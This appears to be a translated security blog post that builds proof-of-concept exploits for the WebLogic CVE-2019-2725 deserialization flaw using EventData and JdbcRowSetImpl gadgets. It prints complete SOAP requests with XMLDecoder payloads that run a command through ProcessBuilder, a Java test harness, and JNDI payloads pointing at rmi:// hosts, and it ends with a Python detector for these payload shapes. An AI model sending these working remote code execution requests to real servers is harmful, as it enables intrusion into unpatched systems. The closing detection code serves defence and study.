# CVE-2019-2725 secondary deserialization: EventData gadget POC / JdbcRowSetImpl POC construction

## CVE-2019-2725 secondary deserialization: EventData gadget POC

When constructing the MapMsgEntity POC, the following error is thrown. The reason, as 畅师傅 already pointed out, is that the current class is not public. To trace exactly how the error is raised, you can proceed as follows; the error output is:
```
java.lang.NoSuchMethodException: <unbound>=Class.new(byteArray);
```
Search the codebase for NoSuchMethodException, step until execution reaches that point, then trace back through the call stack and it is easy to follow.

The vulnerable code is as follows:

The POC is as follows. I did not know how to write the String-typed parameter passed to the EventData class; I hammered out the packet below, which does execute commands. This is a pitfall, and I still need to look at how the experts construct their poc.
```http
POST /_async/AsyncResponseService HTTP/1.1
Host: 121.195.170.96:7001
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 885

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>org.slf4j.ext.EventData</string><void>
<array class="java.lang.String" length="1">
<void index="0">
<string>"<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java>"</string>
</void>
</array>
</void></class>
</java>
</work:WorkContext>
</soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
```
Running the following code executes the command:
```java
package weblogic;

import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.IOException;

public class Test {
    // ByteArrayInputStream works on an in-memory array and opens no file descriptor, so the stream does not need to be closed
    public static void main(String[] args) {
        ByteArrayInputStream bais = null;
        StringBuilder sb = new StringBuilder();
        int temp = 0;
        int num = 0;
        long date1 = System.currentTimeMillis();
        try {
            // bais holds the payload we constructed
            bais = new ByteArrayInputStream("<java version=\"1.8.0_131\" class=\"java.beans.XMLDecoder\"><object class=\"java.lang.ProcessBuilder\"><array class=\"java.lang.String\" length=\"1\"><void index=\"0\"><string>calc</string></void></array><void method=\"start\" /></object></java>".getBytes());
            XMLDecoder decoder = new XMLDecoder(bais);
            decoder.readObject();
            // read whatever is left in the buffer after the decoder consumed it
            while ((temp = bais.read()) != -1) {
                sb.append((char) temp);
                num++;
            }
            System.out.println(sb);
            System.out.println("读取的字节数:" + num);
        } finally {
            try {
                bais.close(); // closing is unnecessary, but calling close has no effect; close does nothing here
            } catch (IOException e) {
                e.printStackTrace();
            }
            new File("d:" + File.separator + "a.txt"); // File.separator is the platform file separator, so this runs on both Windows and Linux
        }
        long date2 = System.currentTimeMillis();
        System.out.println("耗时:" + (date2 - date1));
    }
}
```
While debugging I found that execution never reaches this code.

It was really confusing; I couldn't tell how the poc above popped the calculator. The final Poc is as follows. It turns out the parameter can be placed here: `<void><string><![CDATA[POC]]></string></void>`:
```http
POST /_async/AsyncResponseService HTTP/1.1
Host: 121.195.170.96:7001
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 801

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java>]]></string>
</void></class>
</java>
</work:WorkContext>
</soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
```
Execution finally reaches here: RCE.

There is also the last POC, for the com.sun.rowset.JdbcRowSetImpl class, still to write; I really have to get it working.

## CVE-2019-2725 secondary deserialization: JdbcRowSetImpl gadget POC construction

JDK 1.6 has no property tag; it is available on JDK 1.7 and above. Because the bypass relies on the property tag for assignment, it only works on WebLogic 12; WebLogic 10.3.6 throws the following error:
```
java.lang.Exception: Unrecognized opening tag: property name="dataSourceName"
Continuing ...
java.lang.Exception: Unrecognized closing tag: property
Continuing ...
java.lang.Exception: Unrecognized opening tag: property name="autoCommit"
Continuing ...
java.lang.Exception: Unrecognized closing tag: property
Continuing ...
java.lang.NoSuchMethodException: <unbound>=Class.new("rmi://localhost:9999/aa", Boolean);
```
The POC is as follows:
```http
POST /_async/AsyncResponseService HTTP/1.1
Host: 121.195.170.96:7001
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 694

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>com.sun.rowset.JdbcRowSetImpl</string><void>
<property name="dataSourceName"><string>rmi://localhost:9999/aa</string></property><property name="autoCommit"><boolean>true</boolean></property>
</void></class>
</java>
</work:WorkContext>
</soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
```
The property tag replaces `<void property="">`.

The previous POC:
```xml
<void class="com.sun.rowset.JdbcRowSetImpl">
<void property="dataSourceName">
<string>rmi://121.195.170.127:2222/aa</string>
</void>
<void property="autoCommit">
<boolean>true</boolean>
</void>
</void>
</java>
```
The bypass POC:
```xml
<java>
<class>
<string>com.sun.rowset.JdbcRowSetImpl</string>
<void>
<property name="dataSourceName"><string>rmi://localhost:9999/aa</string>
</property>
<property name="autoCommit">
<boolean>true</boolean>
</property>
</void>
</class>
</java>
```
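Both gadgets above reach the WorkContext XMLDecoder through the same handful of tag shapes: a `<class>` element standing in for `<object>`, a `<string>` whose value is itself a second XMLDecoder document (EventData), and `<property>` elements assigning a JNDI URI to dataSourceName (JdbcRowSetImpl). The following Python is an added detection example, not code from this post or from WebLogic; it parses a SOAP request, locates the WorkContext element and flags those shapes. The tag set, the finding labels and the sample requests are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET

WORKCONTEXT = "{http://bea.com/2004/06/soap/workarea/}WorkContext"
# XMLDecoder element names that legitimate WorkContext payloads have no use for;
# the set is an assumption tuned to the gadget shapes in this post.
SUSPICIOUS_TAGS = {"class", "object", "new", "method", "property"}
# A <string> that itself carries an XMLDecoder document (the EventData trick).
NESTED_DECODER = re.compile(r'<java\b[^>]*class="java\.beans\.XMLDecoder"', re.I)
# A <string> holding a JNDI lookup target (the JdbcRowSetImpl dataSourceName trick).
JNDI_URI = re.compile(r"^\s*(rmi|ldap|ldaps|iiop)://", re.I)


def inspect_workcontext(soap_xml):
    """Return a list of findings for one SOAP request; an empty list means clean."""
    findings = []
    wc = ET.fromstring(soap_xml).find(".//" + WORKCONTEXT)
    if wc is None:
        return findings
    for elem in wc.iter():                 # document order, WorkContext itself first
        tag = elem.tag.split("}")[-1]      # strip any namespace prefix
        if tag in SUSPICIOUS_TAGS:
            findings.append("tag:" + tag)
        if tag == "string" and elem.text:  # CDATA content arrives as plain text
            if NESTED_DECODER.search(elem.text):
                findings.append("nested-xmldecoder")
            if JNDI_URI.match(elem.text):
                findings.append("jndi-uri:" + elem.text.strip())
    return findings


# Constructed sample requests (not captured traffic). The inner "gadget" is a
# placeholder class, not a command; only the shapes mirror the two POCs above.
ENVELOPE = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
            '{}</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>')
EVENTDATA_STYLE = ENVELOPE.format(
    '<java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA['
    '<java version="1.8" class="java.beans.XMLDecoder"><object class="example.Placeholder"/></java>'
    ']]></string></void></class></java>')
JDBCROWSET_STYLE = ENVELOPE.format(
    '<java><class><string>com.sun.rowset.JdbcRowSetImpl</string><void>'
    '<property name="dataSourceName"><string>rmi://attacker.example:9999/aa</string></property>'
    '<property name="autoCommit"><boolean>true</boolean></property></void></class></java>')
BENIGN = ENVELOPE.format('<java><string>plain value</string></java>')

if __name__ == "__main__":
    for name, req in [("eventdata", EVENTDATA_STYLE), ("jdbcrowset", JDBCROWSET_STYLE), ("benign", BENIGN)]:
        print(name, inspect_workcontext(req) or "clean")
```

A WAF or IDS rule can be derived from the same checks; note that the `<class>` tag alone already distinguishes both bypass payloads from the earlier `<void class="...">` form.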
I won't debug the vulnerability itself here; see my earlier write-up at https://www.cnblogs.com/afanti/p/10222293.html

References:
https://paper.seebug.org/909/
Assigning a value to an XML property attribute